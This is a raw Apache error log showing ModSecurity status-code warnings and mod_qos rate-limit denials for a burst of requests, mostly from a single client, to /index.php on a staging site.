[Tue May 26 19:59:36.350703 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QLQAAAM4"]
[Tue May 26 19:59:36.353351 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QMAAAAOk"]
[Tue May 26 19:59:36.356286 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszyXwAAABU"]
[Tue May 26 19:59:36.363706 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszyWgAAABQ"]
[Tue May 26 19:59:36.366650 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258CQAAAc4"]
[Tue May 26 19:59:36.377647 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QHgAAAMY"]
[Tue May 26 19:59:36.391477 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QHAAAAPE"]
[Tue May 26 19:59:36.396158 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258EgAAAgI"]
[Tue May 26 19:59:36.408927 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszyYwAAACk"]
[Tue May 26 19:59:36.410730 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QMQAAAKM"]
[Tue May 26 19:59:36.420438 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258BAAAAgs"]
[Tue May 26 19:59:36.435680 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QMgAAAKo"]
[Tue May 26 19:59:36.438181 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QOAAAAMg"]
[Tue May 26 19:59:36.438236 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258GwAAAd0"]
[Tue May 26 19:59:36.442014 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258CAAAAZQ"]
[Tue May 26 19:59:36.444387 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszyZgAAADw"]
[Tue May 26 19:59:36.449415 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyRwAAAHQ"]
[Tue May 26 19:59:36.450892 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258GgAAAfc"]
[Tue May 26 19:59:36.452803 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258GQAAAZU"]
[Tue May 26 19:59:36.453055 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszyZAAAAFQ"]
[Tue May 26 19:59:36.589939 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUGDRMqfxdEDkoszywgAAAGQ
[Tue May 26 19:59:36.592203 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszywwAAAAk
[Tue May 26 19:59:36.593709 2026] [qos:error] [pid 93868:tid 94339] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258ZAAAAeA
[Tue May 26 19:59:36.595033 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258ZQAAAfA
[Tue May 26 19:59:36.595490 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszyxAAAAAA
[Tue May 26 19:59:36.596284 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258ZgAAAdw
[Tue May 26 19:59:36.600264 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258ZwAAAgQ
[Tue May 26 19:59:36.601900 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszyxQAAAEQ
[Tue May 26 19:59:36.603246 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszyxgAAAHo
[Tue May 26 19:59:36.608207 2026] [qos:error] [pid 93868:tid 94281] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258aAAAAaY
[Tue May 26 19:59:37.197682 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszyzAAAAF4
[Tue May 26 19:59:37.199492 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258bwAAAeo
[Tue May 26 19:59:37.201159 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszyzQAAAGI
[Tue May 26 19:59:37.202645 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszyzgAAADc
[Tue May 26 19:59:37.202767 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258cAAAAao
[Tue May 26 19:59:37.204182 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszyzwAAAFM
[Tue May 26 19:59:37.205641 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy0AAAAG4
[Tue May 26 19:59:37.206010 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258cQAAAaI
[Tue May 26 19:59:37.206925 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258cgAAAfM
[Tue May 26 19:59:37.212447 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258cwAAAgE
[Tue May 26 19:59:37.257524 2026] [security2:error] [pid 106517:tid 106755] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QlAAAAO0"]
[Tue May 26 19:59:37.276965 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QLwAAALc"]
[Tue May 26 19:59:37.286101 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258HAAAAcw"]
[Tue May 26 19:59:37.289320 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszycgAAAHk"]
[Tue May 26 19:59:37.301965 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QOgAAAN8"]
[Tue May 26 19:59:37.302288 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszycAAAACc"]
[Tue May 26 19:59:37.316875 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QOQAAAMQ"]
[Tue May 26 19:59:37.317171 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT0qK9k_ZUB2Vp258HQAAAds"]
[Tue May 26 19:59:37.323794 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszycwAAAEA"]
[Tue May 26 19:59:37.337212 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QQAAAAPI"]
[Tue May 26 19:59:37.342970 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszyegAAAC0"]
[Tue May 26 19:59:37.344559 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QTAAAALg"]
[Tue May 26 19:59:37.347276 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QSwAAANY"]
[Tue May 26 19:59:37.349323 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QOwAAAMI"]
[Tue May 26 19:59:37.361364 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyogAAAHs"]
[Tue May 26 19:59:37.364644 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QQwAAAK8"]
[Tue May 26 19:59:37.368171 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QPgAAAP4"]
[Tue May 26 19:59:37.387271 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT2DRMqfxdEDkoszydwAAAAo"]
[Tue May 26 19:59:37.393854 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyoAAAAGw"]
[Tue May 26 19:59:37.397866 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyoQAAACY"]
[Tue May 26 19:59:37.401360 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QRwAAAJc"]
[Tue May 26 19:59:37.402870 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyowAAAAI"]
[Tue May 26 19:59:37.405062 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QPAAAAOQ"]
[Tue May 26 19:59:37.408430 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUEqK9k_ZUB2Vp258VgAAAbM"]
[Tue May 26 19:59:37.421631 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszypQAAABk"]
[Tue May 26 19:59:37.425038 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuT4ZZc2DoU1lPnP1QUAAAAQQ"]
[Tue May 26 19:59:37.425901 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUEqK9k_ZUB2Vp258WQAAAa4"]
[Tue May 26 19:59:37.427820 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QawAAAI8"]
[Tue May 26 19:59:37.435211 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszypgAAAAg"]
[Tue May 26 19:59:37.447099 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyqgAAAB8"]
[Tue May 26 19:59:37.450722 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUEqK9k_ZUB2Vp258VQAAAaE"]
[Tue May 26 19:59:37.570975 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUYZZc2DoU1lPnP1QzAAAAIo
[Tue May 26 19:59:37.574670 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUUqK9k_ZUB2Vp258mAAAAgA
[Tue May 26 19:59:37.574701 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258mQAAAco
[Tue May 26 19:59:37.576985 2026] [qos:error] [pid 106517:tid 106712] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUYZZc2DoU1lPnP1Q0AAAAMI
[Tue May 26 19:59:37.579153 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUYZZc2DoU1lPnP1Q0gAAALo
[Tue May 26 19:59:37.583453 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258mwAAAeE
[Tue May 26 19:59:37.586244 2026] [qos:error] [pid 106517:tid 106661] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUYZZc2DoU1lPnP1Q1QAAAJA
[Tue May 26 19:59:37.590066 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUYZZc2DoU1lPnP1Q1gAAALQ
[Tue May 26 19:59:37.600038 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUUqK9k_ZUB2Vp258nQAAAZ8
[Tue May 26 19:59:37.609247 2026] [qos:error] [pid 106517:tid 106757] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUYZZc2DoU1lPnP1Q2QAAAO8
[Tue May 26 19:59:37.726295 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258nwAAAcs
[Tue May 26 19:59:37.726298 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258oAAAAgM
[Tue May 26 19:59:37.729492 2026] [qos:error] [pid 93868:tid 94339] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258oQAAAeA
